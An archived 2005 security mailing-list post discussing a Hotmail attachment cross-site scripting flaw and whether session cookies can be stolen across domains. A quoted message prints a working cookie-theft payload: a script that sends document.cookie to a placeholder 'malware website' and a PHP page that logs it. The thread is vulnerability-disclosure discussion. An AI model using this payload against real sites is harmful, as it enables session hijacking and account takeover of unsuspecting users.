Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories

from [Luis A. Cortes Zavala] Network Security [Permanent Link]
Subject: RE: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories
Date: Wed, 4 May 2005 11:15:10 -0500 
The problem here is that since this new window for attachments, you can not
reach the domain for ask cookie, the document.cookie, is empty, you need to
inject innerHTML for ask cookie, but yes it's possible. 

The window that opens attachments is not in the same domain so there's not
cookie, so you have to make cross domain code that it's supposed not to be
possible. So first you need to return to your main window and write some
code to have access.

Cheers
Luis Alberto Cortes Zavala



-----Mensaje original-----
De: Jerome Athias [mailto:jerome.athias@free.fr] 
Enviado el: miércoles, 04 de mayo de 2005 7:41
Para: Sherwyn Williams; Luis A. Cortes Zavala;
full-disclosure@lists.grok.org.uk; vulnwatch@vulnwatch.org;
bugtraq@securityfocus.com
Asunto: Re: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories



Ok I think I get what you are saying, however to use this vuln, would
need to have a script running on a server some where that recieves the 
username and password?

Or just based on what you have here this can be possible. If one does not 
have knowledge of java script, all the would have to do is use those 
various html codes you wrote and send that to them as an attachment, but 
how would I get the username and password ????


For example, this is a simple way to steal a cookie:

Inject this code:

<script>window.open('http://www.your-malware-website.com/givemecook.php?cook
='%2Bdocument.cookie);</script>


And on "your-malware-website" put this page:

givemecook.php:
<?
echo $HTTP_COOKIE_VARS["cook"];
?>

and so, the cookie will be logged in "your-malware-website"



I was testing this until I can get some working code, the authorization 
and
validation of the site is one of the better that I seen on a mailing 
system,
I never heard about vulnerabilities of hotmail as in others systems, I 
just
have knowledge of two flaws discovered. One on 1999 is from George 
Guninski,
and the other when the pwdreset function make its public, every year 
hotmail
is updated, and getting more secure, and it's hard to believe that no one
have found this before.


Try to play with this in hotmail
http://seclists.org/lists/bugtraq/2005/Feb/0473.html

Cheers,
Jerome 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [VulnWatch] Local root vuln in VPN daemon on MacOS X, Pieter de Boer
Next by Date:  Re: [Full-disclosure] Microsoft Windows Image Rendering Memory Limit DoS, Valdis . Kletnieks
Previous by Thread:  Re: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories, Jerome Athias
Next by Thread:  [Full-disclosure] Local root vuln in VPN daemon on MacOS X, Pieter de Boer
Indexes:  [Date] [Thread] [Top] [All Lists]